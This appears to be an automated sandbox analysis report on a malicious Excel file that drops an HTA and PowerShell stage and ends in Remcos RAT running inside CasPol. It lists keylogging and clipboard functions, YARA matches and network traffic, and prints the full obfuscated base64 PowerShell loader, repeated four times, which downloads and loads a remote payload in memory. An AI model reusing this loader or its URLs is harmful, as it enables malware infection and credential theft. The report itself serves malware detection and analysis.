                  Source: mshta.exe, 00000010.00000002.479236959.000000000040E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.000000000040E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478821092.0000000000422000.00000004.00000020.00020000.00000000.sdmp, OC25-11-24.xls, ~DF5ADC8DB78B38F887.TMP.0.drString found in binary or memory: https://provit.uk/OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&ti
                  Source: bhvD598.tmp.30.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: bhvD598.tmp.30.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: CasPol.exe, 0000001E.00000002.534937207.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001E.00000002.534902522.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: bhvD598.tmp.30.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                  Source: CasPol.exe, CasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: CasPol.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhvD598.tmp.30.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                  Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49161 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49169 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49170 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000035_2_004099E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0041183A OpenClipboard,GetLastError,DeleteFileW,30_2_0041183A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,30_2_0040987A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,30_2_004098E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,31_2_00406DFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,31_2_00406E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,33_2_004068B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,33_2_004072B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,35_2_004159C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,35_2_004159C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,35_2_00409B10
                  Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: Yara matchFile source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3784, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000023.00000002.543234045.0000000000505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3784, type: MEMORYSTR

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Contains functionalty to change the wallpaper
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0041BB77 SystemParametersInfoW,35_2_0041BB77

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 2116, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3964, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: CasPol.exe PID: 3784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Excel sheet contains many unusual embedded objects
                  Source: OC25-11-24.xlsOLE: Microsoft Excel 2007+
                  Source: ~DF5ADC8DB78B38F887.TMP.0.drOLE: Microsoft Excel 2007+
                  Microsoft Office drops suspicious files
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgoodthingswhichgosofargoodforeerybody[1].htaJump to behavior
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
